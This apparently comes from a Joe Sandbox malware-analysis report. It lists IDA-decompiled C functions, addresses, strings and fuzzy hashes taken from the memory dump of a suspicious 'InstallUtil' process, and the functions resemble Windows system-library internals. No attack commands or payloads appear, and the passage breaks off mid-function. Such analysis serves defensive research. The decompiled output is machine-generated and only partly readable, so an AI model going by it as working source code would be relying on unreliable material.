				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E01300BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01343706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0130FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01343540;
						E0130FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0131DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01350C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E013097C0();
					}
					return E0130B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01343971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01343884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0130FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E01309650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01343787(_a4,  &_v352, _t80);
						}
					}
					L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E013095D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x01343552
0x0134355a
0x0134355d
0x01343566
0x01343567
0x0134357e
0x0134358f
0x013435a1
0x013435a5
0x0134366b
0x0134366b
0x0134366d
0x01343672
0x01343679
0x01343685
0x0134368d
0x0134369d
0x013436a7
0x013436b8
0x013436c6
0x013436c7
0x013436dc
0x013436e1
0x013436e7
0x013436e9
0x013436e9
0x01343703
0x01343703
0x013435b5
0x013435c0
0x013435c4
0x00000000
0x00000000
0x013435ca
0x013435d7
0x013435e2
0x013435e6
0x013435e8
0x013435f5
0x013435fa
0x01343603
0x01343604
0x01343609
0x0134360a
0x01343612
0x01343613
0x0134361e
0x01343622
0x01343628
0x0134362f
0x0134362f
0x01343636
0x01343638
0x0134363b
0x01343642
0x01343642
0x01343636
0x01343657
0x01343657
0x0134365c
0x01343662
0x01343669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 0134358F

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 1d810712da27c50825571f4417e9be944d4b109b95d7488e418688abf6e689a7
Instruction ID: 76d2678738640a9d3f898103cfa88d7571e635d777fb134b7e12967a5db55cef
Opcode Fuzzy Hash: 1d810712da27c50825571f4417e9be944d4b109b95d7488e418688abf6e689a7
Instruction Fuzzy Hash: 3C4167B1D0052D9BDB21DA54CC80FDEB7BCAB54718F0045A5EB08A7281DB34AE88CF94

Uniqueness

Uniqueness Score: -1.00%

Function 013905AC Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E013905AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E013907DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E01309730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0138A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0138A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E01391293(_t79, _v40, E013907DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E012E7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0138138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x013905c5
0x013905ca
0x013905d3
0x013906db
0x013906db
0x013906dd
0x013906e3
0x013906e3
0x013905dd
0x013905e7
0x013905f6
0x01390600
0x01390607
0x01390610
0x01390615
0x0139061a
0x0139061c
0x0139061e
0x01390624
0x01390625
0x01390627
0x01390628
0x01390631
0x01390640
0x0139064d
0x01390654
0x01390654
0x01390631
0x0139066d
0x01390674
0x00000000
0x00000000
0x01390692
0x0139069e
0x013906b0
0x013906a0
0x013906a9
0x013906a9
0x013906b8
0x013906d6
0x013906d6
0x00000000

Strings

`, xrefs: 01390633

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 72d979d557a67694706319508b19b8cb7316befe196d8ac25a7ad8142df59588
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: AB31B0326043466BEB14DE29CD45F9A7BDDEBC4768F144229BA58AB280D770E904CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 01343884 Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E01343884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E01309650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L012E4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E01309650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x01343893
0x01343896
0x01343899
0x0134389f
0x013438a0
0x013438a4
0x013438a9
0x013438ac
0x013438ad
0x013438ae
0x013438af
0x013438b1
0x013438b4
0x013438bb
0x013438bc
0x013438bd
0x013438c4
0x013438c8
0x013438ca
0x013438ca
0x013438d5
0x0134393e
0x01343940
0x01343942
0x01343952
0x01343954
0x01343961
0x01343961
0x01343967
0x0134396e
0x0134396e
0x01343947
0x0134394c
0x00000000
0x0134394c
0x013438ea
0x013438ee
0x013438f8
0x013438f9
0x013438ff
0x01343900
0x01343902
0x01343903
0x0134390b
0x0134390f
0x01343950
0x00000000
0x01343950
0x01343915
0x0134391d
0x0134391d
0x01343922
0x01343926
0x00000000
0x01343928
0x0134392b
0x0134392b
0x01343935
0x01343937
0x01343937
0x00000000
0x01343935
0x01343926
0x013438f0
0x00000000

Strings

BinaryName, xrefs: 013438B4

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 7e4d25aaaea92ae5aafd0c6f4d2cd7aecad01435a1fb519465c2235fa685d0ca
Instruction ID: 74b259491bf3f18dbe125e648b60a387b498e51bb441e70516b7a9ef8ae31649
Opcode Fuzzy Hash: 7e4d25aaaea92ae5aafd0c6f4d2cd7aecad01435a1fb519465c2235fa685d0ca
Instruction Fuzzy Hash: F031E53690052ABFEB15DA5CC945E7BFBF4FF40728F014169E915A7291D730AE04C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 012FD294 Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E012FD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x13bd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E012E4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0130B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E013098D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E013095D0();
					L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x012fd29c
0x012fd2a6
0x012fd2b1
0x012fd2b5
0x012fd2b6
0x012fd2bc
0x012fd2bd
0x012fd2be
0x012fd2bf
0x012fd2c2
0x012fd2c4
0x012fd2cc
0x012fd384
0x012fd34b
0x012fd34f
0x012fd350
0x012fd351
0x012fd35c
0x012fd35c
0x012fd2d6
0x012fd2da
0x012fd2e1
0x012fd361
0x012fd369
0x012fd36d
0x012fd2e3
0x012fd2e3
0x012fd2e3
0x012fd2e5
0x012fd2ed
0x012fd2f5
0x012fd2fa
0x012fd302
0x012fd303
0x012fd30b
0x012fd30f
0x012fd313
0x012fd318
0x012fd31c
0x012fd320
0x012fd379
0x012fd37d
0x00000000
0x00000000
0x0133affe
0x0133b001
0x0133b011
0x00000000
0x012fd322
0x012fd322
0x012fd330
0x012fd337
0x012fd35d
0x012fd339
0x012fd33f
0x012fd38c
0x012fd38c
0x012fd33f
0x012fd349
0x00000000
0x012fd349

Strings

@, xrefs: 012FD303

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 96261d1e7c46bd0a838f5e75ac94881138ecc72c727819481ec4ddc75f98b723
Instruction ID: 1af43cb96eb2f25d9fe40ca478b209d78bc7d6154d60c608bb6272739d1b2e60
Opcode Fuzzy Hash: 96261d1e7c46bd0a838f5e75ac94881138ecc72c727819481ec4ddc75f98b723
Instruction Fuzzy Hash: DF31C2B656830A9FC721DF68C981A6BFBE8EB85654F00093EFB9483251D634DD04CF92

Uniqueness

Uniqueness Score: -1.00%

Function 012D1B8F Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E012D1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0130BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0130A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0130A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L012E4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x012d1b8f
0x012d1b9a
0x012d1b9c
0x012d1b9e
0x012d1ba3
0x01327010
0x01327010
0x00000000
0x012d1ba9
0x012d1ba9
0x012d1bae
0x00000000
0x012d1bc5
0x012d1bca
0x012d1bcf
0x012d1bd0
0x012d1bd1
0x012d1bd2
0x012d1bd6
0x012d1bdc
0x012d1be0
0x01326ffc
0x01327000
0x00000000
0x01327006
0x01327009
0x01327009
0x012d1be6
0x012d1bec
0x012d1c0b
0x012d1c0b
0x012d1c0c
0x012d1c11
0x012d1c12
0x012d1c15
0x012d1c1b
0x012d1c1f
0x012d1c31
0x012d1c33
0x01327026
0x01327026
0x012d1c21
0x012d1c24
0x012d1c24
0x012d1bee
0x012d1bee
0x012d1bf2
0x012d1c3a
0x012d1bf4
0x012d1bf4
0x012d1c05
0x012d1c05
0x012d1c09
0x012d1c3e
0x00000000
0x00000000
0x00000000
0x012d1c09
0x012d1bec
0x012d1be0
0x012d1bae
0x012d1c2e

Strings

WindowsExcludedProcs, xrefs: 012D1BC5

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 911fd948c49720e6356de2822ca6d886608cb9b185f56ad3401f3f193876cc36
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 9221267B620229ABDB22AA5DC840F6BBBADEF51A54F058425FE04DB600D634DC10C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 012EF716 Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012EF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x012ef71d
0x012ef722
0x012ef726
0x01334770
0x012ef765
0x012ef769
0x012ef769
0x012ef732
0x0133477a
0x00000000
0x0133477a
0x012ef738
0x012ef73a
0x012ef73c
0x012ef73f
0x012ef746
0x012ef778
0x012ef7a9
0x012ef7a9
0x012ef754
0x012ef75a
0x012ef75d
0x012ef75f
0x012ef761
0x012ef76f
0x012ef771
0x012ef771
0x012ef76f
0x012ef763
0x00000000
0x012ef763
0x012ef77d
0x012ef7a3
0x012ef7a5
0x00000000
0x012ef7a5
0x012ef77f
0x012ef782
0x012ef784
0x012ef786
0x00000000
0x00000000
0x00000000
0x012ef788
0x012ef748
0x012ef74d
0x012ef78d
0x012ef793
0x012ef7b7
0x012ef7bc
0x00000000
0x012ef7bc
0x012ef798
0x00000000
0x00000000
0x012ef79d
0x012ef7b0
0x00000000
0x012ef7b0
0x012ef79f
0x00000000
0x012ef74f
0x012ef74f
0x00000000
0x012ef74f

Strings

Actx , xrefs: 012EF73F

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: e144562db8c4228058358871919d79170cb605dbf1c085ff5ea9ee5d61f0bb8a
Instruction ID: 364912439119a1ebe69f49c24c3f20055edd81542301393759ed51ecb537c226
Opcode Fuzzy Hash: e144562db8c4228058358871919d79170cb605dbf1c085ff5ea9ee5d61f0bb8a
Instruction Fuzzy Hash: FA11B6353B47038BEB2D4E1D8B9973676D6EB85624FA5452AEA65CB391D7B0C840C340

Uniqueness

Uniqueness Score: -1.00%

Function 01378DF1 Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E01378DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x13a0d50);
				E0131D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01355720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = E0131DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				E0131DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0131D130(_t34, _t39, _t40);
			}

0x01378df1
0x01378df1
0x01378df1
0x01378df1
0x01378df1
0x01378df1
0x01378df3
0x01378df8
0x01378dfd
0x01378e00
0x01378e0e
0x01378e2a
0x01378e36
0x01378e38
0x01378e3c
0x01378e46
0x01378e46
0x01378e36
0x01378e50
0x01378e56
0x01378e59
0x01378e5c
0x01378e60
0x01378e67
0x01378e6d
0x01378e73
0x01378e74
0x01378eb1
0x01378ebd

Strings

Critical error detected %lx, xrefs: 01378E21

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 0f4e4b2789a56ee0c3d4bfa616734faf556dcf74f29f943d38697c9c13768747
Instruction ID: 238d73d65e5f6e9f1f3cc44f1485d4fa9ce43ae0f331a0b285f32e88717324d0
Opcode Fuzzy Hash: 0f4e4b2789a56ee0c3d4bfa616734faf556dcf74f29f943d38697c9c13768747
Instruction Fuzzy Hash: 72115B75D15348EADF29CFA885097DCBBB0BB15359F24465DE52D6B682C3381601CF14

Uniqueness

Uniqueness Score: -1.00%

Function 01395BA5 Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E01395BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x13a1178);
				E0131D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E01394C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0130D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E01395542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
